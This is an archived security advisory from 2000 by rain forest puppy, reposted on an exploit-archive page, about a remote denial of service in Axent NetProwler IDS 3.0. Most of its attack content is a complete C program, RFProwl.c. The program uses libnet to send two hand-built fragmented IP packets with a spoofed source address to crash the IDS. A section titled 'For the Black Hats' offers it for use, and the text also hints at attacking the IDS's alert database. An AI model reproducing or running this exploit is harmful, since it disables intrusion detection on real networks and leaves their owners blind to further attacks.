exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RFP2K05.txt

RFP2K05.txt
Posted May 19, 2000
Authored by rain forest puppy | Site wiretrip.net

NetProwler 3.0, a network based intrusion detection system, has a remote denial of service vulnerability. The software crashes when two fragmented IP packets are sent to an IP address that it is profiling. Netprowler must be profiling ftp in order for the exploit to work. Please note that Netprowler logs all incoming alerts to a Microsoft .mdb file. Please read RFP2K04.txt for more information.

tags | exploit, remote, denial of service
SHA-256 | 01dfbeff982172b700a96a3ad3afd0f8babfbb62d8508a80fe57958e3f4d2e87

RFP2K05.txt

Change Mirror Download


---------- Forwarded message ----------
Date: Thu, 18 May 2000 22:31:58 -0500 (CDT)
From: rain forest puppy <rfp@wiretrip.net>
To: vacuum@technotronic.com
Subject: RFP2K05: NetProwler vs. RFProwler


---/ RFP2K05 /----------------------------/ rfp.labs / wiretrip /---------

NetProwler vs. RFProwler
Remote denial of service in Axent NetProwler

------------------------------------/ rain forest puppy / rfp@wiretrip.net

Table of contents:

-/ 1 / For the Black Hats
-/ 2 / For the White Hats
-/ 3 / OMG! Look! It's not Perl!


--/ 1 / For the Black Hats /----------------------------------------------

The attached demonstration dribbles two fragmented IP packets to an IP
address which is profiled by NetProwler IDS version 3.0. The result is
that NetProwler chokes, dropping into a lovely Dr. Watson error message.
Note that this was tested with an older version (3.0), since Axent hasn't
sent me an evaluation key (I requested it over 11 days ago) for the latest
version downloadable from the web. Also note that NetProwler needs to be
profiling the FTP service on the victim for this to be effective.

This was found using Dug Song/Anzen's awesome Fragrouter program.
http://www.anzen.com/research/nidsbench/

Also, NetProwler stores incoming alert information in a Jet .mdb. I
suggest you take a look at RFP2K04, and consider the implications. ;)



--/ 2 / For the White Hats /----------------------------------------------

As I mentioned above, this is for version 3.0. Axent was contacted on
Monday, but they never responded. So after a small 'industry-standard'
wait, I have chosen to release this.



--/ 3 / OMG! Look! It's not Perl! /---------------------------------------



/* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net

Kills NetProwler IDS version 3.0

You need libnet installed. It's available from
www.packetfactory.net. Acks to route.

Only tested on RH 6.x Linux. To compile:
gcc RFProwl.c -lnet -o RFProwl

Plus, make sure your architecture is defined below: */

#define LIBNET_LIL_ENDIAN 1
#undef LIBNET_BIG_ENDIAN 1

#include <libnet.h>

/* it's just much easier to code in the packet frags we want. :) */

char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";

int main(int argc, char **argv) {
int sock, c;
u_long src_ip, dst_ip;

printf("RFProwl - rain forest puppy / wiretrip\n");

if(argc<3){
printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
exit(EXIT_FAILURE);}

dst_ip=inet_addr(argv[1]);
src_ip=inet_addr(argv[2]);

memcpy(pack1+16,&dst_ip,4);
memcpy(pack2+16,&dst_ip,4);
memcpy(pack1+12,&src_ip,4);
memcpy(pack1+12,&src_ip,4);

sock = open_raw_sock(IPPROTO_RAW);
if (sock == -1){
perror("Socket problems: ");
exit(EXIT_FAILURE);}

c = write_ip(sock, pack1, 46);
if (c < 46) printf("Write_ip #1 choked\n");

c = write_ip(sock, pack2, 46);
if (c < 46) printf("Write_ip #2 choked\n");

printf("Packets sent\n");

return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);}




----/ acks /--------------------------------------------------------------

eEye, Attrition, w00w00, ADM, Technotronic, USSR, Packetfactory.net

------------------------------------/ rain forest puppy / rfp@wiretrip.net

Since when has TUCOWS become a TLD registrar?!?

---/ RFP2K05 /----------------------------/ rfp.labs / wiretrip /---------



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close